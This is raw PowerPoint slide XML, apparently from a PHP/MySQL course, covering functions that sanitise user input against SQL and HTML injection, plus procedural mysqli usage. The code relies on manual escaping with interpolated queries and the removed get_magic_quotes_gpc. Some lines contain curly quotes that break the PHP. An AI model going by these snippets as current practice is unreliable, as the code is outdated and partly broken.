          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		return $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitizeMySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($connection, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a: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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = $connection-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitizeString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		return $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</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US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add this code to the end of your PHP programs, and you can then call it for each user input to sanitize, like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitizeString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($_POST['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or, when you have an open MySQL connection, and a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> connection object (in this case, called $connection):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitizeMySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($connection, $_POST['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>']);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="797299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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Preventing HTML Injection</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799771"/>
            <a:ext cx="10515600" cy="5058229"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To sanitize the inputs, I recommend that you create a new function, which can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>sanitize for both SQL and XSS injections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_entities_fix_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($conn, $string)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_fix_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($conn, $string));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_fix_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($conn, $string)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>get_magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()) $string = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stripslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($string);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		return $conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($string);</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2691481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87085"/>
            <a:ext cx="10515600" cy="6705600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="2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require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	$conn = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, $un, $pw, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	if ($conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>connect_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) die($conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>connect_error</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$user = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_entities_fix_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($conn, $_POST['user']);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	$pass = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_entities_fix_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($conn, $_POST['pass’]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	$query = "SELECT * FROM users WHERE user='$user' AND pass='$pass’”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	//Etc...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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mysql_entities_fix_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($conn, $string)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_fix_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($conn, $string));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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mysql_fix_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($conn, $string)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>get_magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()) $string = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stripslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($string);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		return $conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($string);</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211112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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> procedurally</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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you prefer, there is an alternative set of functions you can use to access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in a procedural (rather than object-oriented) manner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So, instead of creating a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$conn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>object like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$conn = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, $un, $pw, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can use the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$link = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, $un, $pw, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
